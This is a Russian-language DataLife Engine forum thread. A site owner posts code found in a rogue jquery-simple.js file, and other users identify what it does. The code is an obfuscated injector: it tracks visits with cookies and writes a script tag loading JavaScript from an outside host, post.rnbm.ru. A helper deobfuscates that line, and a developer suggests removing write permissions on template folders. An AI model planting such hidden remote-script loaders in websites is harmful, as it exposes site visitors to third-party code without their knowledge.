Перейти к публикации

Вредоносник

hrompic

Автор: hrompic,
в DataLife Engine (Общие вопросы)

Рекомендованные сообщения

hrompic

hrompic 4

Опубликовано:
Опубликовано:

Сегодня при проверке Антивирусом в админке была обнаружена левая папка JS со скриптом jquery-simple.js .Выкладываю здесь код-гляньте что за зверь:

:("; expires="+ expires.toGMTString()))+ ((path==null)?"":("; path="+path))+ ((domain==null)?"":("; domain="+domain))+ ((secure==true)?"; secure":"")} gomega();
clicko=0;



function gomega()

{

clicko=clicko+1;

if(clicko<2)

{

Traf1788Ru=GoMegaBR('rgood_2');


if(Traf1788Ru<=2)

{

nexting=Number(Traf1788Ru)+1;

lolypop(nexting)}

}


}


function lolypop(gocode)

{

day=new Date();


id=day.getTime();


document.write('<scr'+'ipt type="text/javas'+'cript" src="http://po'+'st.r'+'n'+'b'+'m.r'+'u/j'+'s/sm'+'ar'+'tblock/get-code.js"></scr'+'ipt>');


pathname="/";

myDomain="/";

var largeExpDate=new Date();

largeExpDate.setTime(largeExpDate.getTime()+(4*60*60*1000));

Setkyks('rgood_2',gocode,largeExpDate,"/")}




function GoMegaBRVal(offset){


var endstr=document.cookie.indexOf(";",offset);


if(endstr==-1)

endstr=document.cookie.length;

return unescape(document.cookie.substring(offset,endstr))}


function GoMegaBR(name){

var arg=name+"=";

var alen=arg.length;

var clen=document.cookie.length;

var i=0;

while(i<clen){

var j=i+alen;

if(document.cookie.substring(i,j)==arg)

return GoMegaBRVal(j);

i=document.cookie.indexOf(" ",i)+1;

if(i==0)

break}

return null}


function Setkyks(name,value){

var argv=Setkyks.arguments;

var argc=Setkyks.arguments.length;

var expires=(argc>2)?argv[2]:null;

var path=(argc>3)?argv[3]:null;

var domain=(argc>4)?argv[4]:null;

var secure=(argc>5)?argv[5]:false;

document.cookie=name+"="+escape(value)+

((expires==null)?""

Ссылка на сообщение
Поделиться на других сайтах
notbugme

notbugme 0

Опубликовано:
Опубликовано: 

document.write('<scr'+'ipt type="text/javas'+'cript" src="http://po'+'st.r'+'n'+'b'+'m.r'+'u/j'+'

s/sm'+'ar'+'tblock/get-code.js"></scr'+'ipt>');

цепляет левый js <script type="text/javascript" src="http://post.rnbm.ru/js/smartblock/get-code.js"></script>

Ссылка на сообщение
Поделиться на других сайтах
hrompic

hrompic 4

Опубликовано:
Опубликовано: Автор 

document.write('<scr'+'ipt type="text/javas'+'cript" src="http://po'+'st.r'+'n'+'b'+'m.r'+'u/j'+'

s/sm'+'ar'+'tblock/get-code.js"></scr'+'ipt>');

цепляет левый js <script type="text/javascript" src="http://post.rnbm.ru/js/smartblock/get-code.js"></script>

Спасибо большое! А кроме этой папки для данного скрипта ничего не может быть еще на хостинге? Или этой папки достаточно чтобы скрипт выводился?

И подскажите как обезопасить папку с шаблонами от заливки туда вот таких скриптов?

Ссылка на сообщение
Поделиться на других сайтах
celsoft

celsoft 6220

Опубликовано:
Опубликовано:

И подскажите как обезопасить папку с шаблонами от заливки туда вот таких скриптов?

Скрипт в папки шаблонов ничего не заливает, поэтому DLE обезопасить вас от заливки чего либо не может. Но рекомендуется, если вы не собираетесь файлы шаблона редактировать через админпанель скрипта, тогда убрать права на запись у папки и файлов шаблона.

Ссылка на сообщение
Поделиться на других сайтах
hrompic

hrompic 4

Опубликовано:
Опубликовано: Автор

И подскажите как обезопасить папку с шаблонами от заливки туда вот таких скриптов?

Скрипт в папки шаблонов ничего не заливает, поэтому DLE обезопасить вас от заливки чего либо не может. Но рекомендуется, если вы не собираетесь файлы шаблона редактировать через админпанель скрипта, тогда убрать права на запись у папки и файлов шаблона.

Какие права нужно выставить7

Спасибо!

Ссылка на сообщение
Поделиться на других сайтах

Архивировано

Эта тема находится в архиве и закрыта для публикации сообщений.

Перейти к списку тем
×
×
  • Создать...